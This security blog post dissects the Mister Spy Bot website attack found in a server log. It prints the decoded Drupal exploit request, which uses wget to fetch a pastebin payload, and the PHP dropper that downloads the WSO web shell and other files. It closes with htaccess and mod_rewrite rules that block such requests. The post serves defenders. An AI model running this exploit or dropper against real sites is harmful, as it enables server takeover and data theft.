Dissecting Mister Spy Bot website hack

Created:27 Apr 2018 14:14:09 , in  Security

If you are a website admin or owner you probably scan your HTTP server's logs in search of interesting, or perhaps dangerous, entries from time to time. When doing so, you might have come across a GET or POST HTTP request (or some its variation) which looks like the one described right below this introduction. The request is generated by Mister Spy Bot, a piece of software built specifically to facilitate actions like hacking popular-framework-based websites, stealing data, taking over control of servers / www accounts and much more.

In this article I look closer at what Mister Spy Bot does, what makes it such a dangerous tool and how to prevent it from wrecking havoc on the host before it is too late.

The malicious HTTP request

Requests, both GET and POST ones, generated by Mister Spy Bot look like the one below in a HTTP server log file:

POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=wget+https%3A%2F%2Fpastebin.com%2Fraw%2FtBqLLGbw+-O+spy0x.php HTTP/1.1 

The query string part of the request when decoded is:

user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=wget https://pastebin.com/raw/tBqLLGbw -O spy0x.php

which looks like something designed to exploit a weakness in Drupal. Part of the query string starting with "wget" is meant to upload code hosted on pastebin.com and save it as file called spy0x.php on the server.

If the upload succeeds spy0x.php will have the following content:

<?php
echo "Mister Spy Rce Shell";

    $htaccess = "https://pastebin.com/raw/r659jHVS";
    $file = file_get_contents($htaccess);
    $open = fopen("def.php" , 'w');
    fwrite($open,$file);
    fclose($open);

    $cgi = "https://pastebin.com/raw/A9yeF55J";
    $file = file_get_contents($cgi);
    $open = fopen("p34ky1337.php" , 'w');
    fwrite($open,$file);
    fclose($open);
    
    $htaccess = "https://pastebin.com/raw/8HBFJYd5";
    $file = file_get_contents($htaccess);
    $open = fopen("home.php" , 'w');
    fwrite($open,$file);
    fclose($open);

    $cgi = "https://pastebin.com/raw/eEngaWDu";
    $file = file_get_contents($cgi);
    $open = fopen("r33t.php" , 'w');
    fwrite($open,$file);
    fclose($open);

?>

Now, if the above code gets executed on the server, additional 4 files: def.php, p34ky1337.php, home.php and r33t.php will get written on the server.

Below is what each of them contains:

def.php is a static HTML web page, which when opened tells you, that your server has been hacked using Mister Spy Bot version x.x.

home.php contains a file upload form ready to upload extra files on the server

r33t.php when run outputs some basic system information

Finally, p34ky1337.php is a PHP web shell called WSO Web Shell.

WSO Web Shell

WSO Web Shell is a mixture of PHP, JavaScript and shell code in a single file, released somewhere about year 2010.

Once uploaded on the host, the shell gives the hacker a lot of power. It provides a basic file browser, a lot of security information about the operating system and its version, HTTP server type and its loaded modules, disabled PHP functions, details on hard drives and hosts, also provides some configuration files discovery tools based on find utility.

In addition, WSO Web Shell provides a console for running PHP code and shell commands, allows for MySQL and PostgreeSQL databases manipulations, sending emails, scanning server ports, flooding servers with packets, bypassing PHP safe mode and cracking passwords.

These and other features make it a handy tool for infecting websites with malicious software, disabling login forms, stealing private data and many other malicious actions.

It's enough to look at the first lines of encoded version of the shell's code to draw clear-cut conclusions who it was built for and what purposes it is intended to be used for.

Comments above each line contain values the variables hold:

#fg6sbehpra4co_tnd
$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');

$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};

#base64_decode
$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};

#fopen
$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};

#fget
$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};

#fgets
$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};

#fread
$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};

#strtr (translate characters or replace substrings)
$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};

# current file
$OOO0O0O00=__FILE__;

#113600
$OO00O0000=0x1bbc0;

etc. .

In short, WSO Web Shell is a decent quality tool, which provides more than enough firepower to cause a serious amount of damage both on the host and on the web.

Basics of preventing Mister Spy Bot type attacks

Mister Spy Bot targets vulnerable websites which run on WordPress, Drupal, Joomla, Magento OpenCart and possibly other PHP based systems. It exploits out-of-date framework versions and plugins. Hence, keeping your systems up-to-date should be your first method of defense against infection.

Using fewer plugins is another. Scrutinise these you want to use carefully and thoroughly before including in a live website.

WSO Web Shell, which someone tried to upload to my server was in version 2.6. It is a fairly outdated piece of software considering today's standard, still it requires only a minor tweak to work under PHP 7. Newer, fully functional versions are easy to obtain on the web. One of them will certainly find its way into next versions of Mister Spy Bot.

Stopping Mister Spy Bot with htaccess

One, often futile by itself, method of defending against malicious requests is through blocking host IPs these requests originate from:

# disallow GET and POST requests originating from hosts with given IPs
<limit GET POST>
 Order Allow,Deny
 Allow from all
 # this host will not be granted access
 Deny from HOST.IP.ADDRESS.HERE
</limit>

If you don't feel like chasing ever-changing IPs, a lot of malicious HTTP requests can be efficiently discarded using Apaches mod_rewrite:

# using Apache mod_rewrite check query string for wget%20https,pastebin and spy0x\.php 
<ifModule mod_rewrite.c>
  RewriteEngine On
  # Flags: [N] - next, [C] - chain, [OR] - or next conditon
  RewriteCond %{QUERY_STRING} wget(\+|%20)http(s)?|pastebin.com [NC,OR]
  RewriteCond %{QUERY_STRING} spy0x\.php [NC]
  RewriteRule .* - [F]
</ifModule>

The piece of code above results in 403 Forbidden error returned to a client by Apache if the request is found to be malicious, that is, when it contains strings: "wget https:","pastebin.com" and "spy0x.php" in the query string part.

Either of these pieces of code, or both of them depending on needs, go in your .htaccess file. Make sure Apache's mod_rewrite is enabled for the second part.

Final thoughts

Mister Spy Bot is under active development, constantly evolves, just watch YouTube videos or look it up on the web. The package is a serious treat for many websites built on WordPress, Magento, Joomla, OpenCart, Drupal and other popular frameworks. New versions are very likely to include ever more hacks, up-to-date components and therefore pose still greater treat for the future.

To prevent infection, it's imperative to keep host software up-to-date. On top of that, ensure suspected HTTP requests get rejected as early as possible. Apache mod_rewrite is invaluable for the latter.

I hope, this article gives some insight into Mister Spy Bot workings and gets you started regarding how to defend against it.

This post was updated on 27 Apr 2018 14:18:23

Tags:  Apache ,  php